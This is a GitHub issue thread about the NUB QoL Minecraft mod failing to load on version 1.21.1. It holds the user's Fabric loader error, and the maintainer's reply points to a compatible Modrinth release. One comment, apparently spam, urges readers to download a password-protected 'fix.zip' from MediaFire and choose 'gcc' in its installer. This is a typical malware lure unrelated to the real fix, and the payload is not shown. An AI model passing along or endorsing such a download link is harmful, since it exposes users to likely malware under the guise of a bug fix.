### ISSUE TITLE
1.21.1 support

### ISSUE THREAD

**Issue by SAJewers** [NUB31/nub-qol#4]
attempting to run on 1.21.1 gives this error:
> Incompatible mods found!
> net.fabricmc.loader.impl.FormattedException: Some of your mods are incompatible with the game or each other!
> A potential solution has been determined, this may resolve your problem:
> 	 - Replace mod 'NUB QoL Mods' (nub-qol) 1.0.16 with any version that is compatible with:
> 		 - minecraft 1.21.1
> More details:
> 	 - Mod 'NUB QoL Mods' (nub-qol) 1.0.16 requires version 1.21 of 'Minecraft' (minecraft), but only the wrong version is present: 1.21.1!
> 	 - Mod 'NUB Lib' (nub-lib) 1.0.9 requires version 1.21 of 'Minecraft' (minecraft), but only the wrong version is present: 1.21.1!
> 	at net.fabricmc.loader.impl.FormattedException.ofLocalized(FormattedException.java:51)
> 	at net.fabricmc.loader.impl.FabricLoaderImpl.load(FabricLoaderImpl.java:196)
> 	at net.fabricmc.loader.impl.launch.knot.Knot.init(Knot.java:146)
> 	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:68)
> 	at net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)
> 	at org.prismlauncher.launcher.impl.StandardLauncher.launch(StandardLauncher.java:100)
> 	at org.prismlauncher.EntryPoint.listen(EntryPoint.java:129)
> 	at org.prismlauncher.EntryPoint.main(EntryPoint.java:70)

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NUB31** [comment]
1.21.1 version is now available here https://modrinth.com/mod/nubs-qol-mods/version/rc-1.0.17 :)
